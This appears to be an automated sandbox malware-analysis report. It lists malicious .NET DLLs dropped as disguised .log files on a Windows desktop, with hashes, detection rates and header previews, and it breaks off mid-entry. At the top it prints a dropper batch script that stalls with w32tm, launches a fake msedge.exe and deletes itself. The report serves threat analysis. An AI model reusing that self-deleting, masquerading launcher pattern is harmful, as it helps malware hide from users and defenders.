Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ndC0udATSD.bat"

C:\Users\user\AppData\Local\Temp\wbZB2OBuuy

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:grjHjIXjn:uAz
MD5:	3B87817DB6EC1255F9C3483C6F996F28
SHA1:	953F4CB60182B2096F8C0EFA2DB1BACE6CCC6E2F
SHA-256:	EB17FF714F4BC4DE9F42EB918A7300660223352637955B9D8CD9053943929A83
SHA-512:	5206BF40EF09FACC8F5265354B44E28DEBA16AA2F372DF60D9CECB8FF95921CCDB8E1E5AE36F051BD00F6FA6EE327E328802E293219F9B1F3430DFB0C0783EFF
Malicious:	false
Preview:	cT2N0HfzJFSchAtUdjdk80kz3

C:\Users\user\Desktop\AwpzIjFt.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BlhoAAti.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CQuHWLcS.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\LAdenXtG.log

Download File

Process:	C:\Users\user\AppData\Local\Idle.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\LUAEjdyP.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MsCvKimq.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NDQNJGxB.log

Download File

Process:	C:\Users\user\AppData\Local\Idle.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NohnZlpE.log

Download File

Process:	C:\Users\user\AppData\Local\Idle.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PDYwKARr.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WjFdZuSe.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YlsMudWZ.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\YtKLaCEq.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\aUzlTMCV.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dgcKDzTe.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\iZOTduyR.log

Download File

Process:	C:\Users\user\AppData\Local\Idle.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iyHbCGSC.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\onyQOgMn.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\pGvBroyE.log

Download File

Process:	C:\Users\user\AppData\Local\Idle.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\sharmiXk.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\tGwZoaKl.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
